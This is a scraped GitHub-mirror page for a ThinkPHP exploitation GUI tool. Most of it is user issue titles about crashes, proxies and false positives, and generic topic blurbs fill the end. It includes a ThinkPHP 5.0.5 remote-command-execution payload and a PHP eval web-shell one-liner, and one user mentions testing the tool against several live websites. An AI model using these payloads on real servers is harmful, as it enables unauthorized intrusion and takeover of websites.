学而不思则罔,思而不学则殆。 ---孔子《论语·为政》
lotus6 / thinkphpgui Goto Github PK
View Code? Open in Web Editor NEWThinkphp(GUI)漏洞利用工具,支持各版本TP漏洞检测,命令执行,getshell。
Thinkphp(GUI)漏洞利用工具,支持各版本TP漏洞检测,命令执行,getshell。
测试了几个网站都有漏洞的显示,并且都显示是不同版本的漏洞
然鹅每个getshell都失败了,为何也没看到日志
你这个软件我配置了JAVA环境 为什么老是报错 打不开呢 你用的是什么版本的JAVA呢 可否告知一下 你微信号码
thinkphp5.0.5RCE
Payload:_method=__construct&filter=system&method=get&get[]=whoami
您好,这个漏洞的发现您这个工具没有,一直在用您写的这个工具。
如果检测多的话会看不到下面
换了几个版本的JDK 都没有正常运行
是什么问题呢
https貌似支持不友好
配置了java环境,为啥还是闪退呀?
代理无法使用,抓不到包
在哪里下载
变成
&去掉lt;?php @eval($_POST[a]);?&去掉gt;gt;
(忽略去掉两个字)怎么弄?谢谢
设置代理
一键 getshell 显示详细数据包
检测数据库泄露误判率比较高
[+] 存在ThinkPHP 5.x 数据库信息泄露
Payload: username: hostname: password: database:
你好,请问一下这个怎么利用,网上未搜到相关利用过程
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.